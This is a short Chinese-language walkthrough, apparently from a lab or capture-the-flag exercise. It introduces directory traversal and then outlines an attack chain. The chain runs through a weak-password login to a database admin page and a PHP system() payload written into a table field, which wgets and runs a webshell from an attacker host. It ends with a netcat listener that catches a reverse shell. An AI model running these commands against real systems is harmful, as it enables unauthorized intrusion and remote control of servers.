目錄遍歷漏洞介紹
路徑遍歷攻擊(也稱為目錄遍歷)旨在訪問存儲在web根文件夾之外的文件和目錄。通過操縱帶有“點-斜線(..)”序列及其變化的文件或使用絕對文件路徑來引用文件的變量,可以訪問存儲在文件系統上的任意文件和目錄,包括應用程序源代碼、配置和關鍵系統文件。
需要注意的是,系統操作訪問控制(如在微軟Windows操作系統上鎖定或使用文件)限制了對文件的訪問權限。
這種攻擊也稱為“點-點斜線”、“目錄遍歷”、“目錄爬升”和“回溯”。
注入步驟
- 信息探測:
- 發現數據庫管理界面
- 漏洞掃描
- 使用owasp-zap進行掃描
- 敏感頁面上傳、執行shell
- -- dbadmin敏感目錄有敏感頁面,瀏覽器訪問,使用弱口令嘗試登陸;發現弱口令存在,並登陸成功!
- 生成webshell:
- 登陸頁面之后查找可利用的寫webshell的點;
- 新建數據庫,數據表,字段(寫入<?php system("cd /tmp;wget http:/ /ip:port/webshell.php;chmod +x webshell.php;php webshell");?> )
- 創建服務器用於靶場機器下載對應webshell:-- python -m "SimpleHTTPServer”,注意服務器端口和shell地址端口一致
- 創建監聽:啟動監聽nc:nc –nlvp 端口號
- 執行shell:
- 獲得反彈shell
- 啟動終端優化shell:python –c ‘’import pty;pty.spawn(‘/bin/bash’)
- 小結: